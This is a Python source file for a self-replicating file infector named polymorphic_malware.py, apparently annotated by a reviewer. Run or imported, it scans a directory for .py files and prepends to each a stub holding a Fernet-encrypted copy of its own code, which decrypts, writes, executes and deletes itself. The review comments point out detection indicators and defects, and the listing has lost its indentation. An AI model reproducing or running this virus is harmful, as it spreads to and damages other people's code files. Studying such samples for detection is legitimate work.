polymorphic_malware.py
import os, datetime, inspect, base64, pty, socket;
from cryptography.fernet import Fernet;
# Infection marker. infect() writes this string as the first line of every file
# it modifies, and search() skips any file that already contains it.
# Because the value is fixed, it is a stable indicator for finding modified
# files during triage.
# NOTE(review): the import line above pulls in datetime, base64, pty and socket,
# none of which is referenced anywhere in this listing.
DATA_TO_INSERT = "#SIGNATURE";
# Search for .py files to infect
def search(path):
# Recursively walk `path` and return a list of paths to ".py" files that do
# not yet contain the DATA_TO_INSERT marker.
# NOTE(review): indentation was lost in this listing; the nesting described in
# these comments is inferred from statement order.
filestoinfect = [];
# No error handling: an unreadable directory makes os.listdir raise and
# aborts the whole walk.
filelist = os.listdir(path);
for filename in filelist:
if os.path.isdir(path+"/"+filename):
# Subdirectory: recurse and merge its results into this level's list.
filestoinfect.extend(search(path+"/"+filename));
elif filename[-3:] == ".py": # selection is by the ".py" name suffix only
infected = False;
# The marker is matched as a substring of any line, not just the first one,
# so any file containing the text "#SIGNATURE" anywhere is treated as
# already modified and left alone.
# The handle returned by open() is never closed explicitly.
for line in open(path+"/"+filename):
if DATA_TO_INSERT in line: # marker found -> stop scanning this file
infected = True;
break;
if infected == False:
filestoinfect.append(path+"/"+filename);
return filestoinfect;
# Infect files
def infect(filestoinfect):
# Rewrite every file in `filestoinfect` so that it starts with a seven-line
# stub (marker, import line, key, cipher object, encrypted copy of this
# script, decrypt call, transfer line) followed by the file's original text.
# Returns nothing; the effect is the on-disk modification.
# NOTE(review): indentation was lost in this listing; the nesting described in
# these comments is inferred from statement order.
#
# Path of the source file this function's code object was compiled from.
target_file = inspect.currentframe().f_code.co_filename;
virus = open(os.path.abspath(target_file));
virusstring = "";
# Read this script's own source into virusstring. `i>=0` is always true for
# enumerate(), so the effective rule is "the first 60 lines".
for i,line in enumerate(virus):
if i>=0 and i <60:
virusstring += line;
# Attribute reference without a call: the handle is not closed by this line.
virus.close;
# Two constant plaintext lines that end up in every modified file. Because
# they never vary, they (together with the marker) are what a static rule or
# grep can match on, even though the encrypted blob differs per file.
decrypt_header = "from cryptography.fernet import Fernet; import os";
# At run time of a modified file this line appends the decrypted text `x` to a
# fixed path, runs it with execfile (a Python 2 builtin) and deletes the file.
# The create/execute/delete sequence on one fixed path is a behavioural
# indicator for file-system monitoring.
transfer = 'f = open("/path/to/directory/virus.py", "a");f.write(x);f.close();execfile("/path/to/directory/virus.py");os.remove("/path/to/directory/virus.py")' #Required for the copy to be able to execute itself.
# A new Fernet key is generated for each file, so the encrypted blob is
# different in every modified file.
for fname in filestoinfect:
key = Fernet.generate_key();
cipher_suite = Fernet(key);
# Keep the original content in memory so it can be written back after the stub.
f = open(fname);
temp = f.read();
f.close();
# Mode "w" truncates the file in place; there is no backup or temp-file swap,
# so a failure before the write completes leaves the file damaged.
f = open(fname,"w");
encrypted_virusstring = cipher_suite.encrypt(virusstring)
decrypt = "x = cipher_suite.decrypt(encrypted_virusstring)";
# The key is written in clear text right next to the ciphertext, so the
# encryption hides nothing from an analyst; its only effect is that the
# payload bytes differ from file to file.
# Layout written: seven stub lines, then `temp` unchanged, which means the
# original file content is recoverable by dropping those leading lines.
f.write(DATA_TO_INSERT + '\n' + decrypt_header + '\n' + "key = " + ' " ' + key + ' " ' + '\n' + "cipher_suite = Fernet(key)" + '\n' + "encrypted_virusstring = " + ' " ' + encrypted_virusstring + ' " ' '\n' + decrypt + '\n' + transfer + '\n' + temp);
f.close();
# Entry point: both calls below sit at module level, so the scan and the file
# rewrites start as soon as this file is executed or imported.
# Disabled alternative start directory. os.path.abspath("") resolves to the
# current working directory, not the filesystem root.
#filestoinfect = search(os.path.abspath(""))
# Active configuration: the scan is limited to one placeholder directory.
filestoinfect = search("/path/to/directory");
infect(filestoinfect);